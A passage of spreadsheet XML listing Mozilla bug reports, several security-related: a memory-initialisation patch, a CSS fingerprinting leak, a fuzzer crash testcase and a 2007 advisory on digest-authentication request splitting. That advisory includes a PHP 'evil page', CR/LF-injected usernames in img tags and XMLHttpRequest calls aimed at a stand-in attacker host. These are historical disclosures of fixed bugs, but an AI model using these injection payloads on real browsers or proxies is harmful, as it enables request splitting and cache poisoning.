        <is>
          <t>2024-05-30 08:07:30 -0700</t>
        </is>
      </c>
      <c r="E2968" t="n">
        <v>1</v>
      </c>
      <c r="F2968" t="n">
        <v>1</v>
      </c>
      <c r="G2968" t="n">
        <v>3</v>
      </c>
      <c r="H2968" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2968" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2968" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2968" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2968" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2968" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2968" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2968" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2968" t="inlineStr">
        <is>
          <t>[qa-][adv-main25+][adv-esr1710+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q2968" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2968" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2968" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T2968" t="n">
        <v>1</v>
      </c>
      <c r="U2968" t="n">
        <v>0</v>
      </c>
      <c r="V2968" t="n">
        <v>34</v>
      </c>
      <c r="W2968" t="inlineStr">
        <is>
          <t>Created attachment 805013
calloc-fixes.patch
I observed this use of uninitialized memory in the js shell running under valgrind on Ubuntu Precise x86-64:
==21933== Conditional jump or move depends on uninitialised value(s)
==21933==    at 0x529A4E0: inflateReset2 (inflate.c:157)
==21933==    by 0x529A5D8: inflateInit2_ (inflate.c:193)
==21933==    by 0x816AE9: js::DecompressString(unsigned char const*, unsigned long, unsigned char*, unsigned long) (jsutil.cpp:132)
==21933==    by 0x5ABDA4: JSRuntime::initSelfHosting(JSContext*) (SelfHosting.cpp:753)
==21933==    by 0x6CDB95: js::NewContext(JSRuntime*, unsigned long) (jscntxt.cpp:201)
==21933==    by 0x68B9B2: JS_NewContext(JSRuntime*, unsigned long) (jsapi.cpp:827)
==21933==    by 0x416940: NewContext(JSRuntime*) (js.cpp:4914)
==21933==    by 0x418CEB: main (js.cpp:5546)
This bug is caused by code in jsutil.cpp allocating memory for zlib using regular malloc, where zlib expects the memory to be zeroed.
While investigating this, I also noticed that the multiplication computing the buffer size for the malloc call is not checked for overflow. Informally looking around, I found a few other places that were performing unchecked multiplications to compute buffer sizes. Attached is a patch which fixes all of the bugs I found:
The change in jsd_lock.cpp is a boring cleanup.
The change in Utility.h introduces an overload of js_calloc with two arguments. This is used by the jsutil.cpp fixes described below.
The changes in BaselineBailouts.cpp and IonCode.h add overflow checks on multiplications computing buffer sizes. It might be impossible to force overflows in these places, because other things would very likely fail first, but there wasn't anything explicitly protecting them. This patch explicitly protects them.
The change in jsutil.cpp fixes two bugs: It zeros out the allocated memory, which fixes the uninitialized memory bug described above. And, it uses the two-argument calloc, allowing libc to check the multiplication for overflow.</t>
        </is>
      </c>
      <c r="X2968" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2969">
      <c r="A2969" t="n">
        <v>1025267</v>
      </c>
      <c r="B2969" t="inlineStr">
        <is>
          <t>2014-06-13 14:01:27 -0700</t>
        </is>
      </c>
      <c r="C2969" t="inlineStr">
        <is>
          <t>-moz-handler css pseudo-classes leak plugin state to content</t>
        </is>
      </c>
      <c r="D2969" t="inlineStr">
        <is>
          <t>2017-01-05 09:08:18 -0800</t>
        </is>
      </c>
      <c r="E2969" t="n">
        <v>1</v>
      </c>
      <c r="F2969" t="n">
        <v>1</v>
      </c>
      <c r="G2969" t="n">
        <v>3</v>
      </c>
      <c r="H2969" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2969" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2969" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K2969" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2969" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2969" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2969" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2969" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2969" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main47+]</t>
        </is>
      </c>
      <c r="Q2969" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2969" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2969" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T2969" t="n">
        <v>1</v>
      </c>
      <c r="U2969" t="n">
        <v>0</v>
      </c>
      <c r="V2969" t="n">
        <v>24</v>
      </c>
      <c r="W2969" t="inlineStr">
        <is>
          <t>So we have a list of magic pseudo-classes[1] that nodes apply to themselves to cause chrome CSS to attach a binding[2], but these are not apparently restricted from content, allowing:
&gt; myElement.mozMatchesSelector(":-moz-handler-disabled")
This leaks information about if the user has a installed-but-disabled plugin, allowing fingerprinting of all plugins present on the system, ignoring enabled state.
Other information that can be inferred, though less important:
- If we're using 'play preview', allowing detection of pdf.js handlers vs native plugins
- Reason a plugin didn't load (click-to-play vs blocklist vs blocklist click to play...)
- Infer a user's blocklist state if they have vulnerable plugins
There's also a few non-plugin magic selectors that might be leaking things content shouldn't see such as :-moz-window-inactive, but I haven't investigated how those are used.
[1] http://dxr.mozilla.org/mozilla-central/source/layout/style/nsCSSPseudoClassList.h#154
[2] http://dxr.mozilla.org/mozilla-central/source/toolkit/mozapps/plugins/content/pluginProblemBinding.css</t>
        </is>
      </c>
      <c r="X2969" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2970">
      <c r="A2970" t="n">
        <v>378787</v>
      </c>
      <c r="B2970" t="inlineStr">
        <is>
          <t>2007-04-25 14:14:00 -0700</t>
        </is>
      </c>
      <c r="C2970" t="inlineStr">
        <is>
          <t>IE 7 and Firefox Browsers Digest Authentication Request Splitting</t>
        </is>
      </c>
      <c r="D2970" t="inlineStr">
        <is>
          <t>2008-03-20 09:20:44 -0700</t>
        </is>
      </c>
      <c r="E2970" t="n">
        <v>1</v>
      </c>
      <c r="F2970" t="n">
        <v>1</v>
      </c>
      <c r="G2970" t="n">
        <v>3</v>
      </c>
      <c r="H2970" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2970" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2970" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K2970" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2970" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2970" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2970" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2970" t="inlineStr">
        <is>
          <t>[sg:high] need branch patch</t>
        </is>
      </c>
      <c r="Q2970" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2970" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2970" t="inlineStr">
        <is>
          <t>mozilla1.9alpha5</t>
        </is>
      </c>
      <c r="T2970" t="n">
        <v>1</v>
      </c>
      <c r="U2970" t="n">
        <v>0</v>
      </c>
      <c r="V2970" t="n">
        <v>24</v>
      </c>
      <c r="W2970" t="inlineStr">
        <is>
          <t>reported at the URL listed and mail to websecurity@webappsec.org by stefano.dipaola@wisec.it
Title:
IE 7 and Firefox Browsers Digest Authentication
Original Discovery and Research:
Stefano Di Paola
Vulnerable:
Internet Explorer 7.0.5730.11
Mozilla Firefox 2.0.0.3
Severity:
Medium
Vendor :
http://www.microsoft.com/
http://www.mozilla.com/
Type of Vulnerability:
HTTP Request Splitting
Tested On :
Firefox 2.0.0.3 under Windows XP SP2,
Firefox 2.0.0.3 under Ubuntu 6.06,
Internet Explorer SP2 under Windows XP SP2.
Discovery Date :
20070213
Release Date :
20070425
I) Short description
Firefox and Internet Explorer are prone to Http Request Splitting when
Digest Authentication occurs. If anyone wants to know about HTTP Request
Splitting, HTTP Request Splitting attacks are described in various
papers and advisories:
1. http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf
2. http://www.webappsec.org/lists/websecurity/archive/2006-07/msg00069.html
3. http://download2.rapid7.com/r7-0026/
4. http://www.wisec.it/docs.php?id=4 (PDF, About Auto Injection with Req.Split.)
II) Long description
As explained in Rfc2617 (http://www.ietf.org/rfc/rfc2617.txt) Digest
Authentication is a more secure way to exchange user credentials.
Rfc uses the following example:
--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;
The first time the client requests the document, no Authorization
header is sent, so the server responds with:
      HTTP/1.1 401 Unauthorized
      WWW-Authenticate: Digest
	      realm="testrealm@host.com",
	      qop="auth,auth-int",
	      nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
	      opaque="5ccc069c403ebaf9f0171e9517f40e41"
The client may prompt the user for the username and password, after
which it will respond with a new request, including the following
Authorization header:
Authorization: Digest username="Mufasa",
	realm="testrealm@host.com",
	nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
	uri="/dir/index.html",
	qop=auth,
	nc=00000001,
	cnonce="0a4f113b",
	response="6629fae49393a05397450978507c4ef1",
	opaque="5ccc069c403ebaf9f0171e9517f40e41"
--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;
So there's a response by the client (browser) with username in clear.
There are two ways to send credentials in html/javascript:
XMLHttpRequest("GET","page",async, "user","pass");
And with img/iframes or related:
&lt;img src="http://user:pass@host/page"&gt;
But what if the username contains \r\n or urlencoded %0d%0a?
Let's use an Evil page like this:
--8&lt;-- http://evilhost/req.php --8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;
&lt;?php
header('Set-Cookie: PHPSESSID=6555');
if((int)intval($_COOKIE['PHPSESSID']) !== 6555){
 header('HTTP/1.0 401 Authorization Required");
 header('WWW-Authenticate: Digest realm="1@example.com", \
qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",\
opaque="5ccc069c403ebaf9f0171e9517f40e41"');
 header('Proxy-Connection: keep-alive');
} else {
 // header("Set-Cookie: PHPSESSID=0");
}
header('Connection: keep-alive');
?&gt;
&lt;html&gt;&lt;head&gt;
&lt;meta http-equiv='Connection' content="keep-alive"&gt;&lt;/head&gt;
&lt;body&gt;&lt;script&gt;
// Some Printing in order to show document DOM properties
// in the poisoned page
for(var i in document)
document.write(i+' '+eval('document.'+i)+'&lt;br&gt;');
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;
Which asks for a digest authentication only once.
III) Direct URL Authentication
Let's try it with Firefox:
&lt;img  src="http://user%0aname:pp@evilhost/req.php"&gt;
Let's see what happens after the first request:
--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;
HTTP/1.1 401 Authorization Required
Set-Cookie: PHPSESSID=6555
WWW-Authenticate: Digest realm="1@example.com", qop="auth,auth-int",nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="5ccc069c403ebaf9f0171e9517f40e41"
Proxy-Connection: keep-alive
Connection: keep-alive, Keep-Alive
Content-Length: 146
Keep-Alive: timeout=15, max=100
Content-Type: text/html; charset=UTF-8
...
--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;
and then Firefox resend its request:
--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;
GET /req.php HTTP/1.1
Host: at.tack.er
User-Agent: Mozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.3)
Gecko/20060601 Firefox/2.0.0.3 (Ubuntu-edgy)
Keep-Alive: 300
Connection: keep-alive
Authorization: Digest username="user
name", realm="1@example.com", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", uri="/req.php", response="e398c5c7583b4ca115978c486bb766f8", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=00000001, cnonce="58e1c23271698745"
Cookie: PHPSESSID=6555
--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;
Everyone can see there's a splitting where the %0a was.
The rest of the story is straightforward, an attacker could inject a
second request, and in presence of a proxy (about 2 million people use
it), a request splitting attack could be accomplished.
IV) Firefox Add-On
A redirection could be used:
&lt;img  src="http://evilhost/redir.php"&gt;
With redir.php :
&lt;?php
header("Location: http://user%0aname:ds@avilhost/req.php");
?&gt;
Or by using various redirectors around the web.
Note: Internet Explorer 7 is not vulnerable with imgs nor with other
direct requests.
V) XMLHttpRequest Authentication
IE 7 and Firefox are both vulnerable. Let's use a standard request
with XMLHttpRequest:
--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--
x=new XMLHttpRequest();
x.open("POST","req.php?",false,"user\r\nname","pass");
x.setRequestHeader("Proxy-Connection","keep-alive");
x.onreadystatechange=function (){
   if (x.readyState == 4){
  }
}
// The payload with a request to a page with evil content
x.send("RequestPayload");
--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--8&lt;--
This will result in a similar splitting like the one with images tags.
What you could do with these splittings? A lot, for example in the presence 
of a proxy the local proxy cache could be poisoned.
The previous references details this and other attacks.
Note: there is some difference between IE and Firefox, but it'll 
be left as an exercise for the reader.</t>
        </is>
      </c>
      <c r="X2970" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2971">
      <c r="A2971" t="n">
        <v>1431198</v>
      </c>
      <c r="B2971" t="inlineStr">
        <is>
          <t>2018-01-17 12:12:08 -0800</t>
        </is>
      </c>
      <c r="C2971" t="inlineStr">
        <is>
          <t>Add telemetry environment's new security software fields</t>
        </is>
      </c>
      <c r="D2971" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:28 -0700</t>
        </is>
      </c>
      <c r="E2971" t="n">
        <v>1</v>
      </c>
      <c r="F2971" t="n">
        <v>1</v>
      </c>
      <c r="G2971" t="n">
        <v>2</v>
      </c>
      <c r="H2971" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2971" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J2971" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2971" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2971" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2971" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2971" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2971" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2971" t="inlineStr"/>
      <c r="Q2971" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2971" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2971" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2971" t="n">
        <v>1</v>
      </c>
      <c r="U2971" t="n">
        <v>0</v>
      </c>
      <c r="V2971" t="n">
        <v>10</v>
      </c>
      <c r="W2971" t="inlineStr">
        <is>
          <t>In bug 1418131 I added fields for security software registered on Windows machines. I'd like to be able to surface those in redash et al
Note that these fields are only present when the submitter's OS is Windows 8 or newer.
Rather than repeating the same information here, the "antivirus" "antispyware" and "firewall" fields are documented in toolkit/components/telemetry/docs/data/environment.rst</t>
        </is>
      </c>
      <c r="X2971" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2972">
      <c r="A2972" t="n">
        <v>1264998</v>
      </c>
      <c r="B2972" t="inlineStr">
        <is>
          <t>2016-04-15 09:07:46 -0700</t>
        </is>
      </c>
      <c r="C2972" t="inlineStr">
        <is>
          <t>Assertion failure: bailoutId &lt; bailoutEntries_, at js/src/jit/IonCode.h:477 involving oomTest</t>
        </is>
      </c>
      <c r="D2972" t="inlineStr">
        <is>
          <t>2017-01-05 09:13:31 -0800</t>
        </is>
      </c>
      <c r="E2972" t="n">
        <v>1</v>
      </c>
      <c r="F2972" t="n">
        <v>1</v>
      </c>
      <c r="G2972" t="n">
        <v>3</v>
      </c>
      <c r="H2972" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2972" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2972" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2972" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2972" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2972" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2972" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2972" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2972" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main48+]</t>
        </is>
      </c>
      <c r="Q2972" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2972" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2972" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T2972" t="n">
        <v>1</v>
      </c>
      <c r="U2972" t="n">
        <v>0</v>
      </c>
      <c r="V2972" t="n">
        <v>11</v>
      </c>
      <c r="W2972" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 10f66b316457 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --enable-simulator=arm --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-offthread-compile=off):
loadFile(`
setJitCompilerOption("ion.warmup.trigger", 0);
function floor(a, b) {
    return Math.floor((a | 0) / (b | 0)) | 0;
}
assertEq(floor(5, 5), 1);
assertEq(floor(4, 3), 1);
`);
function loadFile(lfVarx)
  oomTest(function() { eval(lfVarx); });
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x0846f6d6 in bailoutToSnapshot (bailoutId=1, this=&lt;optimized out&gt;) at js/src/jit/IonCode.h:477
#0  0x0846f6d6 in bailoutToSnapshot (bailoutId=1, this=&lt;optimized out&gt;) at js/src/jit/IonCode.h:477
#1  js::jit::BailoutFrameInfo::BailoutFrameInfo (this=0xffff9fb0, activations=..., bailout=0xf59ffad8) at js/src/jit/arm/Bailouts-arm.cpp:104
#2  0x089a5099 in js::jit::Bailout (sp=sp@entry=0xf59ffad8, bailoutInfo=bailoutInfo@entry=0xf59ffad0) at js/src/jit/Bailouts.cpp:42
#3  0x084f8a82 in js::jit::Simulator::softwareInterrupt (this=0xf7a1c000, instr=0xf7a03784) at js/src/jit/arm/Simulator-arm.cpp:2347
#4  0x084f8d76 in js::jit::Simulator::decodeType7 (this=0xf7a1c000, instr=0xf7a03784) at js/src/jit/arm/Simulator-arm.cpp:3502
#5  0x084f6cb5 in js::jit::Simulator::instructionDecode (this=this@entry=0xf7a1c000, instr=instr@entry=0xf7a03784) at js/src/jit/arm/Simulator-arm.cpp:4424
#6  0x084fab94 in execute&lt;false&gt; (this=0xf7a1c000) at js/src/jit/arm/Simulator-arm.cpp:4479
#7  js::jit::Simulator::callInternal (this=this@entry=0xf7a1c000, entry=entry@entry=0xf7fc89c0 "\360O-\351\004\320M\342\020\212-\355\r\200\240\341h\220\235\345t\240\235", &lt;incomplete sequence \345&gt;) at js/src/jit/arm/Simulator-arm.cpp:4567
#8  0x084fb0c0 in js::jit::Simulator::call (this=0xf7a1c000, entry=entry@entry=0xf7fc89c0 "\360O-\351\004\320M\342\020\212-\355\r\200\240\341h\220\235\345t\240\235", &lt;incomplete sequence \345&gt;, argument_count=argument_count@entry=8) at js/src/jit/arm/Simulator-arm.cpp:4650
#9  0x082f3d61 in EnterIon (data=..., cx=0xf7a74020) at js/src/jit/Ion.cpp:2751
#10 js::jit::IonCannon (cx=cx@entry=0xf7a74020, state=...) at js/src/jit/Ion.cpp:2846
#11 0x086fc32f in js::RunScript (cx=cx@entry=0xf7a74020, state=...) at js/src/vm/Interpreter.cpp:406
#12 0x086fc58e in js::InternalCallOrConstruct (cx=0xf7a74020, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:498
#13 0x086fc924 in InternalCall (cx=cx@entry=0xf7a74020, args=...) at js/src/vm/Interpreter.cpp:525
#14 0x086fc99f in js::CallFromStack (cx=cx@entry=0xf7a74020, args=...) at js/src/vm/Interpreter.cpp:531
#15 0x0826d2b9 in js::jit::DoCallFallback (cx=cx@entry=0xf7a74020, frame=frame@entry=0xf59ffdd8, stub_=stub_@entry=0xf34b5210, argc=argc@entry=2, vp=vp@entry=0xf59ffd78, res=res@entry=...) at js/src/jit/BaselineIC.cpp:6116
#16 0x084f8b3e in js::jit::Simulator::softwareInterrupt (this=0xf7a1c000, instr=0xf552f2f4) at js/src/jit/arm/Simulator-arm.cpp:2380
[...]
#35 0x0824d986 in EnterBaseline (cx=cx@entry=0xf7a74020, data=...) at js/src/jit/BaselineJIT.cpp:150
#36 0x0826824e in js::jit::EnterBaselineMethod (cx=cx@entry=0xf7a74020, state=...) at js/src/jit/BaselineJIT.cpp:188
#37 0x086fc29b in js::RunScript (cx=cx@entry=0xf7a74020, state=...) at js/src/vm/Interpreter.cpp:416
#38 0x086fc58e in js::InternalCallOrConstruct (cx=0xf7a74020, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:498
#39 0x086fc924 in InternalCall (cx=cx@entry=0xf7a74020, args=...) at js/src/vm/Interpreter.cpp:525
#40 0x086fc9d4 in js::Call (cx=0xf7a74020, fval=fval@entry=..., thisv=thisv@entry=..., args=..., rval=rval@entry=...) at js/src/vm/Interpreter.cpp:544
#41 0x0852a800 in JS_CallFunction (cx=cx@entry=0xf7a74020, obj=..., fun=fun@entry=..., args=..., rval=rval@entry=...) at js/src/jsapi.cpp:2876
#42 0x088373e6 in OOMTest (cx=0xf7a74020, argc=1, vp=0xf54260b0) at js/src/builtin/TestingFunctions.cpp:1310
#43 0x08702daa in js::CallJSNative (cx=0xf7a74020, native=0x88370e0 &lt;OOMTest(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:235
[...]
#57 main (argc=5, argv=0xffffccb4, envp=0xffffcccc) at js/src/shell/js.cpp:7455
eax	0x0	0
ebx	0x986d31c	159830812
ecx	0xf7e3a88c	-136075124
edx	0x0	0
esi	0x2	2
edi	0xffff9fb0	-24656
ebp	0xffff9f48	4294942536
esp	0xffff9f10	4294942480
eip	0x846f6d6 &lt;js::jit::BailoutFrameInfo::BailoutFrameInfo(js::jit::JitActivationIterator const&amp;, js::jit::BailoutStack*)+486&gt;
=&gt; 0x846f6d6 &lt;js::jit::BailoutFrameInfo::BailoutFrameInfo(js::jit::JitActivationIterator const&amp;, js::jit::BailoutStack*)+486&gt;:	movl   $0x1dd,0x0
   0x846f6e0 &lt;js::jit::BailoutFrameInfo::BailoutFrameInfo(js::jit::JitActivationIterator const&amp;, js::jit::BailoutStack*)+496&gt;:	call   0x8101b70 &lt;abort()&gt;
Since the assertion looks like a range assertion to me, marking as s-s until investigated.</t>
        </is>
      </c>
      <c r="X2972" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2973">
      <c r="A2973" t="n">
        <v>470671</v>
      </c>
      <c r="B2973" t="inlineStr">
        <is>
          <t>2008-12-21 09:18:28 -0800</t>
        </is>
      </c>
      <c r="C2973" t="inlineStr">
        <is>
          <t>Thunderbird l10n linux nightly following wrong mozilla tree</t>
        </is>
      </c>
      <c r="D2973" t="inlineStr">
        <is>
          <t>2010-10-19 10:35:37 -0700</t>
        </is>
      </c>
      <c r="E2973" t="n">
        <v>1</v>
      </c>
      <c r="F2973" t="n">
        <v>1</v>
      </c>
      <c r="G2973" t="n">
        <v>6</v>
      </c>
      <c r="H2973" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2973" t="inlineStr">
        <is>
          <t>Mozilla Messaging Graveyard</t>
        </is>
      </c>
      <c r="J2973" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K2973" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2973" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2973" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2973" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2973" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2973" t="inlineStr"/>
      <c r="Q2973" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2973" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2973" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2973" t="n">
        <v>1</v>
      </c>
      <c r="U2973" t="n">
        <v>0</v>
      </c>
      <c r="V2973" t="n">
        <v>10</v>
      </c>
      <c r="W2973" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.0.5) Gecko/2008122108 Firefox/3.0.5 Flock/2.0.3
Build Identifier: 
At least since 2008.12.18 linux comm-central l10n thunderbird nightly builds are following mozilla-central instead mozilla-1.9.1 which results in busted builds (missing file) for "green" locales, lack of testing packages for our qa teams and is generally wrong/bad.
Please fix that ASAP.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X2973" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2974">
      <c r="A2974" t="n">
        <v>680162</v>
      </c>
      <c r="B2974" t="inlineStr">
        <is>
          <t>2011-08-18 10:53:51 -0700</t>
        </is>
      </c>
      <c r="C2974" t="inlineStr">
        <is>
          <t>search box available to guests and non-vouched users</t>
        </is>
      </c>
      <c r="D2974" t="inlineStr">
        <is>
          <t>2012-04-19 20:30:26 -0700</t>
        </is>
      </c>
      <c r="E2974" t="n">
        <v>1</v>
      </c>
      <c r="F2974" t="n">
        <v>1</v>
      </c>
      <c r="G2974" t="n">
        <v>5</v>
      </c>
      <c r="H2974" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2974" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J2974" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K2974" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2974" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2974" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2974" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2974" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2974" t="inlineStr"/>
      <c r="Q2974" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2974" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2974" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2974" t="n">
        <v>1</v>
      </c>
      <c r="U2974" t="n">
        <v>0</v>
      </c>
      <c r="V2974" t="n">
        <v>3</v>
      </c>
      <c r="W2974" t="inlineStr">
        <is>
          <t>Steps to Reproduce:
1. Go to https://mozillians-dev.allizom.org/
Actual Results:
The search box is available on the page
Expected Results:
The search box should not be shown/visible/usable unless the user is logged in as a vouched mozillian.</t>
        </is>
      </c>
      <c r="X2974" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2975">
      <c r="A2975" t="n">
        <v>1188590</v>
      </c>
      <c r="B2975" t="inlineStr">
        <is>
          <t>2015-07-28 13:25:25 -0700</t>
        </is>
      </c>
      <c r="C2975" t="inlineStr">
        <is>
          <t>jsjni_GetGlobalClassRef goes reentrant on main</t>
        </is>
      </c>
      <c r="D2975" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:26 -0700</t>
        </is>
      </c>
      <c r="E2975" t="n">
        <v>1</v>
      </c>
      <c r="F2975" t="n">
        <v>1</v>
      </c>
      <c r="G2975" t="n">
        <v>3</v>
      </c>
